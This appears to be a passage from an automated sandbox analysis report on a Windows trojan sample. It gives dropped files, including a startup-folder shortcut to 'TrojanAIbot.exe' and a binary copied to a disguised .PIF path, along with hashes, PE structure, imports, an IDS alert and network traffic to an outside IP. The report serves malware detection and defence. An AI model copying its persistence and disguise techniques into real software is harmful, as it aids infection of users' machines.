Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 26 06:13:12 2024, mtime=Tue Nov 26 06:13:12 2024, atime=Tue Nov 26 06:13:09 2024, length=231936, window=
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.4928008911803565
Encrypted:	false
SSDEEP:	24:8apHfJ8rZ069q45UAns4FSnplwO4ZTqlSkhJm:8apH2C6Y49s4+plwZTqlSk3
MD5:	7205215A927CC9407842ABBFA6CC5376
SHA1:	BC656F77B44267B0F034F7892E8DF512D8F1CBD6
SHA-256:	C927EE14357D502385D00667B3ACDB01928AB8AB0E720894BF58BF01397EF0E0
SHA-512:	31673DBCDA66E33BB885F6B5707FC633DC9D9D3FFF1F91B6E429FE8904DD49B3DF0F86269015862231F22D79E47A3F95C424D4E941C16FC6D6429903F92E3445
Malicious:	false
Preview:	L..................F.@.. ...2....?..K....?.......?............................:..DG..Yr?.D..U..k0.&...&...... M.........?......?......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlzY.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....zY.9..Roaming.@......DWSlzY.9....C......................E..R.o.a.m.i.n.g.....T.1.....zY.9..ACCApi..>......zY.9zY.9....).........................A.C.C.A.p.i.....l.2.....zY.9 .TROJAN~1.EXE..P......zY.9zY.9....*.....................s..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........,.pr.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	591
Entropy (8bit):	4.641908060391267
Encrypted:	false
SSDEEP:	12:qKrxTzP1eSbZ7u0wxDDDDDDDDjCaY5eUaYAQUTB8NGNe:FrxTzdp7u0wQakJaBt8NR
MD5:	15A0C655F699EC7BB94CDC85CC8043F4
SHA1:	FC1027DC9E053288927A572190DC83B7E6603B68
SHA-256:	DB3133534FF1DAD257CEDD8123F49798EB5AF7CFA4F89E1D82812906306604C0
SHA-512:	ED8877B838BEC062F96A06B4E39A522A7085E14930C87107CC9BFF99992C2184A6743C4E64D924647CF8F4D3A0C17B34AFD8C26CDEE82C84FFA1433D7003C39E
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\2jbMIxCFsK.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x154000 (1392640) (1 MB)....Total bytes written = 0x154000 (1392640) (1 MB).......Operation completed successfully in 0.109 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.401846851033825
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	2jbMIxCFsK.exe
File size:	1'392'640 bytes
MD5:	67dac6ae9ee770115db85cc71979dc41
SHA1:	a708539ebb312329f56f064a8491e4c6e1bd7ce8
SHA256:	054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
SHA512:	9ff88c70d4a2f7628a2f853d576b8e7d7ebf3409de13d56895a06eb2fdc827beef45ec982dbc69a9577ed78d27d44f5df2284cdf614ba4debadaf74cd07c204d
SSDEEP:	24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
TLSH:	4C558D3AD2418F35D73A25394D8A72ACC758DD741823674F12B0B8D6AB341BB9F5C28E
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	474726342a2a1343

Static PE Info

General

Entrypoint:	0x477804
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1cf89bd16e37e0c37d1d880d9b260250

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004767D4h
call 00007FFA30D45011h
mov eax, dword ptr [00483334h]
mov eax, dword ptr [eax]
call 00007FFA30D975F5h
mov ecx, dword ptr [004834A8h]
mov eax, dword ptr [00483334h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00476450h]
call 00007FFA30D975F5h
mov eax, dword ptr [00483334h]
mov eax, dword ptr [eax]
call 00007FFA30D97669h
call 00007FFA30D42FFCh
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x88000	0x27e8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x95000	0xc8200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8d000	0x72f0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8c000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x88768	0x63c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x75a1c	0x75c00	d57cde4170c25f5d08008796cad956c8	False	0.5248971602972399	data	6.547715469019442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x77000	0x84c	0xa00	573f43ad83f7618f70b0dca6f069a6d6	False	0.527734375	data	5.550394697894556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x78000	0xb4d4	0xb600	17f94756d9f74a6af798866472818ed8	False	0.10323660714285714	data	5.955797407613151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x84000	0x36bc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x88000	0x27e8	0x2800	d6d67b578a55c915bb419857427b5e40	False	0.32392578125	data	5.202280923464677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x8b000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x8c000	0x18	0x200	5dc775149b0a138379f8fa3a2dac85d4	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8d000	0x72f0	0x7400	2ddee8524b7582c38792a7625197880e	False	0.6354054418103449	data	6.67972265985048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x95000	0xc8200	0xc8200	7562e91cb3c1fee8858fd8a0b8df7f04	False	0.5916248633666459	data	7.476322451277447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x95b40	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x95c74	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x95da8	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x95edc	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x96010	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x96144	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x96278	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x963ac	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x9657c	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x96760	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x96930	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x96b00	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x96cd0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x96ea0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x97070	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x97240	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x97410	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x975e0	0xb2f98	Device independent bitmap graphic, 997 x 245 x 24, image size 733040	English	United States	0.6320824466633929
RT_BITMAP	0x14a578	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x14a660	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4999 x 4999 px/m			0.20560165975103734
RT_DIALOG	0x14cc08	0x52	data			0.7682926829268293
RT_DIALOG	0x14cc5c	0x52	data			0.7560975609756098
RT_STRING	0x14ccb0	0xd0	data			0.6009615384615384
RT_STRING	0x14cd80	0x34c	data			0.45023696682464454
RT_STRING	0x14d0cc	0xdc	data			0.6545454545454545
RT_STRING	0x14d1a8	0xd8	data			0.6574074074074074
RT_STRING	0x14d280	0x108	data			0.6174242424242424
RT_STRING	0x14d388	0x3e0	data			0.40725806451612906
RT_STRING	0x14d768	0x3a4	data			0.38197424892703863
RT_STRING	0x14db0c	0x370	data			0.4022727272727273
RT_STRING	0x14de7c	0x3cc	data			0.33539094650205764
RT_STRING	0x14e248	0x214	data			0.49624060150375937
RT_STRING	0x14e45c	0xcc	data			0.6274509803921569
RT_STRING	0x14e528	0x194	data			0.5643564356435643
RT_STRING	0x14e6bc	0x3c4	data			0.3288381742738589
RT_STRING	0x14ea80	0x338	data			0.42961165048543687
RT_STRING	0x14edb8	0x294	data			0.42424242424242425
RT_RCDATA	0x14f04c	0x10	data			1.5
RT_RCDATA	0x14f05c	0x308	data			0.6971649484536082
RT_RCDATA	0x14f364	0x70ac	Delphi compiled form 'TAboutForm'			0.39037581472749966
RT_RCDATA	0x156410	0x6c63	Delphi compiled form 'TOpenForm'			0.3646159945219303
RT_GROUP_CURSOR	0x15d074	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x15d088	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x15d09c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x15d0b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x15d0c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x15d0d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x15d0ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x15d100	0x14	data			1.25

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharLowerA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T08:13:00.554575+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	198.252.105.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:12:59.205281019 CET	49704	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.205336094 CET	443	49704	198.252.105.91	192.168.2.5
Nov 26, 2024 08:12:59.205420971 CET	49704	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.205624104 CET	49704	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.205674887 CET	443	49704	198.252.105.91	192.168.2.5
Nov 26, 2024 08:12:59.205733061 CET	49704	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.251653910 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.251691103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:12:59.251755953 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.253295898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:12:59.253314018 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:00.554485083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:00.554574966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:00.725619078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:00.725651026 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:00.726003885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:00.766648054 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:00.811110973 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:00.851325989 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.164844990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.213340998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.357304096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357316971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357371092 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357386112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357409000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357422113 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.357451916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.357470989 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.357546091 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.401490927 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.401510000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.401608944 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.401637077 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.401685953 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.451678038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.451703072 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.451807976 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.451843977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.451894045 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.575824976 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.575869083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.575999022 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.576023102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.576073885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.604923010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.604942083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.605074883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.605097055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.605145931 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.630100965 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.630121946 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.630258083 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.630290031 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.630343914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.756248951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.756273985 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.756395102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.756407022 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.756455898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.777868986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.777890921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.777957916 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.777987003 CET	443	49705	198.252.105.91	192.168.2.5
Nov 26, 2024 08:13:01.778004885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.778031111 CET	49705	443	192.168.2.5	198.252.105.91
Nov 26, 2024 08:13:01.799153090 CET	443	49705	198.252.105.91	192.168.2.5
